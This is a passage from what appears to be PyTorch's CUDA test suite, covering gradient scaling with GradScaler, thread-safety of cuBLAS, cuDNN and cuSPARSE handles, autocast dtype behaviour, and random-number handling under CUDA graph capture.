torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
